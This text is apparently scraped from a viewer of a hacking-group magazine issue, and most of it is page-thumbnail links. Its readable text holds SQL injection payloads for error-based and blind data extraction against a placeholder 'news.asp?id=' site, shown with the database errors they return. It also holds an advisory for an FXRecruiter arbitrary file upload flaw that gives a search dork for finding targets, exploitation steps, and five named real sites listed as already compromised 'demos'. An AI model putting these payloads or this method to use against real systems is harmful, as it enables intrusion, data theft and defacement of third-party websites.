- zanjan university of medical scienceszums.ac.ir/files/it/pages/ashiyane_mag_no4.pdfashiyane...
TRANSCRIPT
![Page 1: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/1.jpg)
![Page 3: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/3.jpg)
Ashiyane Digital Security Team
![Page 4: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/4.jpg)
Ashiyane Digital Security Team
![Page 5: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/5.jpg)
Ashiyane Digital Security Team
![Page 6: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/6.jpg)
Ashiyane Digital Security Team
![Page 7: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/7.jpg)
Ashiyane Digital Security Team
![Page 8: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/8.jpg)
Ashiyane Digital Security Team
www.site.com/news.asp?id=@@Version
www.site.com/news.asp?id=(Select Name
From SysObject Where Xtype=’U’)
Microsoft OLE DB Provider for ODBC Driverserror ‘80004005’
[Microsoft][ODBC SQL Server Driver][SQLServer]Subquery returned more than 1 value.This is not permitted when the subqueryfollows =, !=, <, <= , >, >= or when thesubquery is used as an expression
Select Top 1 Name From SysObjects Where
Xtype=’U’
![Page 9: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/9.jpg)
Ashiyane Digital Security Team
news.asp?id=(Select Top 1 Name From
SysObject Where Xtype=’U’ And Name Not In
(‘User’))
www.site.com/news.asp?id=2 Having 1=1
Microsoft OLE DB Provider for ODBC Driverserror ‘80040e14’
[Microsoft][ODBC SQL Server Driver][SQLServer]Column ‘dbo. MeetingDetails.id ‘ isinvalid in the select list because it is notcontained in an aggregate function and thereis no GROUP BY clause.
www.site.com/news.asp?id=2 Group By id
Having 1=1www.site.com/news.asp?id=5 And
SubString(@@version,1,1)=5
www.site.com/news.asp?id=5 And 5=5
![Page 10: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/10.jpg)
Ashiyane Digital Security Team
news.asp?id=5 And (Select SubString
(Concat(1,Column-name),1,1)FRom
Table_Name Limit 0,1)=1
<And ascii (SubString((Select
Concat(Column_Name) From Table_Name
Limit 0,1),1,1))><Char
And ascii (SubString((Select
Concat(User_Name) From Users Limit
0,1),1,1)) > 98
news.asp?id=5 And ( Select 1 From
Table_Name Limit 0,1)=1
![Page 11: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/11.jpg)
Ashiyane Digital Security Team
![Page 12: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/12.jpg)
Ashiyane Digital Security Team
![Page 13: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/13.jpg)
Ashiyane Digital Security Team
![Page 14: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/14.jpg)
Ashiyane Digital Security Team
![Page 15: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/15.jpg)
Ashiyane Digital Security Team
![Page 16: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/16.jpg)
Ashiyane Digital Security Team
![Page 17: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/17.jpg)
Ashiyane Digital Security Team
http://cloud.github.com/downloads/easyphp/easyphp/EasyPHP-5.3.6.0-setup.exe
![Page 18: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/18.jpg)
Ashiyane Digital Security Team
![Page 19: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/19.jpg)
Ashiyane Digital Security Team
![Page 20: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/20.jpg)
Ashiyane Digital Security Team
www.wampserver.com/en/
mysql , mssql , oracle , msql , postgresql
![Page 21: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/21.jpg)
Ashiyane Digital Security Team
![Page 22: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/22.jpg)
Ashiyane Digital Security Team
![Page 23: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/23.jpg)
Ashiyane Digital Security Team
![Page 24: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/24.jpg)
Ashiyane Digital Security Team
![Page 25: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/25.jpg)
Ashiyane Digital Security Team
![Page 26: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/26.jpg)
Ashiyane Digital Security Team
![Page 27: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/27.jpg)
Ashiyane Digital Security Team
=======================================================================# FXRecruiter Arbitary File Upload Vulnerability=======================================================================# Name: FXRecruiter Arbitary File Upload Vulnerability
# Vendor: http://www.fxrecruiter.co.uk & http://www.reversedelta.com
# Risk: High
# Date: 2011-03-27
# Author: Ashiyane Digital Security Team
# Contact: XroGuE_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org/forums/
# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !
==========================================================================
[+] Dork: intext:”Powered by FXRecruiter” & inurl:”page.php?page=*.php”
==========================================================================[+] Note : You must Register at site, Then in “Upload CV Field” Select and
[-] Upload Your File, then Using “Live Http Header” Change ur File Format To Etc ...
[+] Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File].*
[+] Demo1: http://www.resourcing-solutions.com/fxmodules/resumes/haha_ehehe.html
[+] Demo2: http://www.energyintoenergy.com/fxmodules/resumes/p3rsi4n_hack3r_xrogue1.html
[+] Demo3: http://peoplemarketing.co.uk/fxmodules/resumes/black_xrogue.html
[+] Demo4: http://www.charles-hunter.com/fxmodules/resumes/black_hat_xrogue.html
[+] Demo5: http://www.activesolutionsrecruitment.com/fxmodules/resumes/black_hat_xrogue.html==========================================================================
# Why I Put 5 Demo Site ????
* For Some People That Think my Report’s Is Fake or not AVAILABLE At Net... !!! :-l
$ Need Live Video ??? : ~>
Video : http://www.vimeo.com/21464321
Video http://www.4shared.com/file/AIwSyKn-/FXRecruiter_Arbitary_File_Uplo.html
==========================================================================[+] Taghdim be Baxe Ashiyane, Happy New Year... omidVaram Sale KHoobi dashte bashin ![+] Discovered By XroGuE !!!
BUG
![Page 28: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/28.jpg)
Ashiyane Digital Security Team
Zone-HZone-H
http://zone-h.org/stats/notifierspecial
![Page 29: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/29.jpg)
Ashiyane Digital Security Team
![Page 30: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/30.jpg)
Ashiyane Digital Security Team
![Page 31: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/31.jpg)
Ashiyane Digital Security Team
![Page 32: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/32.jpg)
Ashiyane Digital Security Team
![Page 33: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/33.jpg)
Ashiyane Digital Security Team
![Page 34: - Zanjan University of Medical Scienceszums.ac.ir/files/IT/pages/ashiyane_mag_no4.pdfAshiyane Digital Security Team ===== # FXRecruiter Arbitary File Upload Vulnerability](https://reader034.vdocuments.mx/reader034/viewer/2022042115/5e9260e81388bb0edd3c2714/html5/thumbnails/34.jpg)